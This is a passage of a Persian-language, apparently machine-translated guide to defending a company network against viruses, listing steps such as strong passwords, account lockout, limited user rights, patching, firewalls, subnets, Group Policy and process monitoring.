گام 2 خط مشی رمز عبور ویروس ها (تروجان ها) می توانند رایانه های موجود در شبکه را با حدس زدن رمزهای عبور حساب های استاندارد: root، admin، Administrator، Administrator آلوده کنند. همیشه از رمزهای عبور پیچیده استفاده کنید! برای حساب های بدون رمز عبور یا با رمزهای عبور ساده، مدیر سیستم باید با یک ورودی مربوطه در کتاب کار اخراج شود. پس از 10 بار تلاش برای وارد کردن رمز عبور نادرست، حساب باید به مدت 5 دقیقه مسدود شود تا در برابر زور بی رحمانه (حدس زدن رمز عبور با شمارش ساده) محافظت شود. اکیداً توصیه می‌شود که حساب‌های سرپرست داخلی تغییر نام داده و غیرفعال شوند. رمزهای عبور باید به صورت دوره ای تغییر کنند.

مرحله 3 محدودیت حقوق کاربر یک ویروس (تروجان) از طرف کاربری که آن را راه اندازی کرده است در شبکه پخش می شود. اگر حقوق کاربر محدود باشد: دسترسی به رایانه های دیگر، هیچ حقوق مدیریتی برای رایانه او وجود ندارد، در این صورت حتی یک ویروس در حال اجرا نیز نمی تواند چیزی را آلوده کند. غیرمعمول نیست که مدیران سیستم خود عامل انتشار یک ویروس شوند: آنها کلید مدیریت را راه اندازی کردند و ویروس تمام رایانه های موجود در شبکه را آلوده کرد ...

مرحله 4 نصب منظم به روز رسانی های امنیتی. کار سختی است، اما باید انجام شود. شما باید نه تنها سیستم عامل، بلکه همه برنامه ها را نیز به روز کنید: DBMS، سرورهای ایمیل.

مرحله 5 محدودیت راه های نفوذ ویروس ها. ویروس ها از دو طریق وارد شبکه محلی یک شرکت می شوند: از طریق رسانه های قابل جابجایی و از طریق شبکه های دیگر (اینترنت). با ممانعت از دسترسی به USB، CD-DVD، یک راه را کاملا مسدود می کنید. با محدود کردن دسترسی به اینترنت، مسیر دوم را مسدود می کنید. این روش بسیار موثر است، اما اجرای آن دشوار است.

مرحله 6 فایروال ها (ITU)، آنها نیز فایروال (فایروال) هستند، آنها نیز فایروال هستند. آنها باید در مرزهای شبکه نصب شوند. اگر رایانه شما مستقیماً به اینترنت متصل است، ITU باید فعال باشد. اگر رایانه فقط به یک شبکه محلی (LAN) متصل است و از طریق سرورها به اینترنت و سایر شبکه ها دسترسی دارد، در این صورت نیازی به فعال کردن ITU در این رایانه نیست.

مرحله 7 تقسیم یک شبکه سازمانی به زیر شبکه شکستن شبکه طبق این اصل راحت است: یک بخش در یک زیرشبکه، بخش دیگر در دیگری. زیرشبکه ها را می توان در لایه فیزیکی (SCS)، در لایه پیوند داده (VLAN)، در لایه شبکه (زیر شبکه ها با آدرس های IP قطع نمی شوند) تقسیم کرد.

مرحله 8 ویندوز یک ابزار فوق‌العاده برای مدیریت امنیت گروه‌های بزرگ رایانه دارد - اینها سیاست‌های گروهی (GPOs) هستند. از طریق GPO، می‌توانید رایانه‌ها و سرورها را طوری پیکربندی کنید که آلودگی و توزیع بدافزار تقریباً غیرممکن شود.

مرحله 9 دسترسی به ترمینال 1-2 سرور ترمینال در شبکه ایجاد کنید که از طریق آن کاربران به اینترنت دسترسی داشته باشند و احتمال آلوده شدن رایانه های شخصی آنها به صفر برسد.

مرحله 10 پیگیری کلیه فرآیندها و سرویس های در حال اجرا بر روی رایانه ها و سرورها. می توانید آن را طوری تنظیم کنید که وقتی یک فرآیند (سرویس) ناشناخته شروع می شود، به مدیر سیستم اطلاع داده شود. نرم افزارهای تجاری که می توانند این کار را انجام دهند هزینه زیادی دارند، اما در برخی موارد هزینه ها موجه است.

بالا